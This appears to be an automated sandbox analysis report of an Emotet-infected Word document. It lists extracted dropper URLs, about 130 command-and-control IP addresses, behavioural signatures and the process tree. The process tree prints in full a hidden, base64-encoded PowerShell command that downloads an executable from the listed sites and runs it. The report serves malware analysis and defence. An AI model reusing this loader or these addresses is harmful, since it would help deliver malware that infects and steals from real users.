Analysis
-
max time kernel
26s -
resource
win10v191014 -
submitted
18-12-2019 20:48
General
Malware Config
Extracted
http://moisesdavid.com/qoong/vy/
http://insurancebabu.com/wp-admin/iXElcu9f/
http://rishi99.com/framework.impossible/dhADGeie6/
https://www.alertpage.net/confirmation/2nX/
https://anttarc.org/chartaxd/DMBuiwf5u/
Extracted
emotet
1.215.28.101:8080
184.167.148.162:80
66.25.34.20:80
165.227.156.155:443
167.99.105.223:7080
67.225.179.64:8080
176.31.200.130:8080
190.220.19.82:443
91.242.138.5:443
159.65.25.128:8080
61.197.110.214:80
110.143.84.202:80
95.128.43.213:8080
91.73.197.90:80
201.184.105.242:443
108.179.206.219:8080
181.57.193.14:80
188.152.7.140:80
139.130.241.252:443
197.254.221.174:80
144.139.247.220:80
211.63.71.72:8080
165.228.24.197:80
31.31.77.83:443
110.142.38.16:80
78.24.219.147:8080
58.171.42.66:8080
64.53.242.181:8080
104.137.176.186:80
66.209.97.122:8080
50.116.86.205:8080
47.6.15.79:80
217.160.182.191:8080
206.189.112.148:8080
31.172.240.91:8080
86.98.156.239:443
182.176.132.213:8090
173.91.11.142:80
179.13.185.19:80
64.147.15.138:80
218.44.21.114:80
176.106.183.253:8080
120.150.246.241:80
87.106.136.232:8080
59.148.227.190:80
107.170.24.125:8080
116.48.142.21:443
75.80.148.244:80
37.157.194.134:443
45.33.49.124:443
190.53.135.159:21
128.65.154.183:443
201.173.217.124:443
100.14.117.137:80
93.147.141.5:80
206.81.10.215:8080
82.27.181.93:80
85.152.174.56:80
104.131.44.150:8080
178.210.51.222:8080
1.33.230.137:80
47.156.70.145:80
104.131.11.150:8080
2.38.99.79:80
31.131.182.30:80
46.216.60.138:80
209.97.168.52:8080
200.7.243.108:443
178.209.71.63:8080
73.214.99.25:80
85.72.180.68:80
85.67.10.190:80
183.102.238.69:465
209.141.54.221:8080
219.78.255.48:80
80.21.182.46:80
5.88.182.250:80
62.75.187.192:8080
68.118.26.116:80
101.187.134.207:443
92.222.216.44:8080
5.154.58.24:80
104.236.246.93:8080
149.202.153.252:8080
59.103.164.174:80
212.64.171.206:80
173.12.14.133:8080
195.244.215.206:80
47.6.15.79:443
45.51.40.140:80
73.176.241.255:80
37.59.24.177:8080
212.129.24.79:8080
12.176.19.218:80
110.143.57.109:80
81.0.63.86:8080
190.189.224.117:443
5.196.74.210:8080
46.105.131.87:80
82.155.161.203:80
87.230.19.21:8080
186.75.241.230:80
186.67.208.78:8080
174.81.132.128:80
138.59.177.106:443
211.44.35.111:80
66.34.201.20:7080
91.205.215.66:443
70.175.171.251:80
24.93.212.32:80
174.77.190.137:8080
31.177.54.196:443
83.136.245.190:8080
210.6.85.121:80
189.209.217.49:80
190.147.215.53:22
190.12.119.180:443
101.187.247.29:80
74.105.102.97:8080
70.46.247.81:80
192.241.255.77:8080
87.106.139.101:8080
167.71.10.37:8080
2.237.76.249:80
201.251.133.92:443
2.235.190.23:8080
173.247.19.238:80
Signatures
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4648 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4648 Powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
873.exe873.exepid process 4416 873.exe 3872 873.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4944 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4944 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4648 5056 Powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE873.exe873.exepid process 4944 WINWORD.EXE 4416 873.exe 3872 873.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe873.exedescription pid process target process PID 4648 wrote to memory of 4416 4648 Powershell.exe 873.exe PID 4416 wrote to memory of 3872 4416 873.exe 873.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
873.exepid process 3872 873.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\56211d219a01b6d0c646482a545e1dbdce0e1ea6bf371915d4a28dcf47f693c4.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4944
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABCAHcAbABiAGoAagBtAGoAegB2AD0AJwBJAHQAbQBwAG0AcgBuAGgAbABsAHUAJwA7ACQAVgBpAGkAaQBnAHAAegBlAGUAcwB2ACAAPQAgACcAOAA3ADMAJwA7ACQATgBqAHMAdABiAGgAbAB1AG8APQAnAFUAcgBlAGEAZgB2AG4AdABzAHgAdwBuAG8AJwA7ACQASwBkAHEAZwBsAHcAYQBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABWAGkAaQBpAGcAcAB6AGUAZQBzAHYAKwAnAC4AZQB4AGUAJwA7ACQASAByAHkAcABjAHAAdQBiAD0AJwBRAGYAdQBpAGYAbwBlAGQAJwA7ACQATQBrAHgAdABqAGkAYQByAHIAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBOAHQAOwAkAFYAZwB4AHAAcgBhAG0AagBzAGIAPQAnAGgAdAB0AHAAOgAvAC8AbQBvAGkAcwBlAHMAZABhAHYAaQBkAC4AYwBvAG0ALwBxAG8AbwBuAGcALwB2AHkALwAqAGgAdAB0AHAAOgAvAC8AaQBuAHMAdQByAGEAbgBjAGUAYgBhAGIAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQBYAEUAbABjAHUAOQBmAC8AKgBoAHQAdABwADoALwAvAHIAaQBzAGgAaQA5ADkALgBjAG8AbQAvAGYAcgBhAG0AZQB3AG8AcgBrAC4AaQBtAHAAbwBzAHMAaQBiAGwAZQAvAGQAaABBAEQARwBlAGkAZQA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAGwAZQByAHQAcABhAGcAZQAuAG4AZQB0AC8AYwBvAG4AZgBpAHIAbQBhAHQAaQBvAG4ALwAyAG4AWAAvACoAaAB0AHQAcABzADoALwAvAGEAbgB0AHQAYQByAGMALgBvAHIAZwAvAGMAaABhAHIAdABhAHgAZAAvAEQATQBCAHUAaQB3AGYANQB1AC8AJwAuACIAUwBQAGwAYABpAFQAIgAoACcAKgAnACkAOwAkAEEAaQBnAGYAcQBoAGQAcABrAHIAdwBlAD0AJwBaAHUAdwB6AGgAawBhAHEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAdQB6AGgAZABmAHEAbwBjAGoAdwB4ACAAaQBuACAAJABWAGcAeABwAHIAYQBtAGoAcwBiACkAewB0AHIAeQB7ACQATQBrAHgAdABqAGkAYQByAHIALgAiAEQAYABPAHcATgBgAGwATwBBAEQAZgBpAEwARQAiACgAJABDAHUAegBoAGQAZgBxAG8AYwBqAHcAeAAsACAAJABLAGQAcQBnAGwAdwBhAG8AKQA7ACQATwBwAHMAawBtAGoAcgBqAHkAYQBhAHoAbAA9ACcAVQBsAGUAcQBmAGcAbQBlAHQAagBrAHIAZgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEsAZABxAGcAbAB3AGEAbwApAC4AIgBsAGAARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMwA2ADkANwA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABBAGAAUgBUACIAKAAkAEsAZABxAGcAbAB3AGEAbwApADsAJABLAGEAaQByAGEAcABzAGMAYgB6AG0APQAnAFoAegBqAGUAYQBtAHoAdwAnADsAYgByAGUAYQBrADsAJABSAGIAbAB5AGIAYwByAGwAPQAnAEoAcQB6AGMAYQB5AGYAcwBjAHAAZgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAagBiAG4AZgBqAGYAdQA9ACcAUQBxAHAAcQByAGEAagBuAHoAawBzAGoAYQAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Users\Admin\873.exe"C:\Users\Admin\873.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Users\Admin\873.exe--30b989523⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
PID:3872